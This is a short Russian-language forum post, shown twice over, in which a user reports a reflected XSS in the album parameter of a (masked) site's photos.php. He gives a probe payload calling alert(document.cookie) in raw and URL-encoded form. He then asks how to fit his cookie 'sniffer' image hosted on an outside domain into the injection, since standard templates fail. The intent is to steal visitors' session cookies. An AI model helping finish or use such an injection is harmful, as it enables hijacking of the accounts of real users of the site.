Radzhab
22.05.2014, 01:00
Нашел на сайте пассивную xss.
http://xxx.ru/photos.php?album='+ (https://hpc.name/redirector.html#http://xxx.ru/photos.php?album='+) alert(document.cookie)+' вот общий вид.
source:
http:
//xxx
.ru/photos.php?album=%27%
2
B%20alert(document.cookie)%
2
B%27
вот в браузере.
http://httpz.org/nhv3ykvcrvt.gif (https://hpc.name/redirector.html#http://httpz.org/nhv3ykvcrvt.gif) вот моя пикча для сниффера. Как его пихнуть в эту xss? Стандартные шаблоны не подходят
http://xxx.ru/photos.php?album='+ (https://hpc.name/redirector.html#http://xxx.ru/photos.php?album='+) alert(document.cookie)+' вот общий вид.
source:
http:
//xxx
.ru/photos.php?album=%27%
2
B%20alert(document.cookie)%
2
B%27
вот в браузере.
http://httpz.org/nhv3ykvcrvt.gif (https://hpc.name/redirector.html#http://httpz.org/nhv3ykvcrvt.gif) вот моя пикча для сниффера. Как его пихнуть в эту xss? Стандартные шаблоны не подходят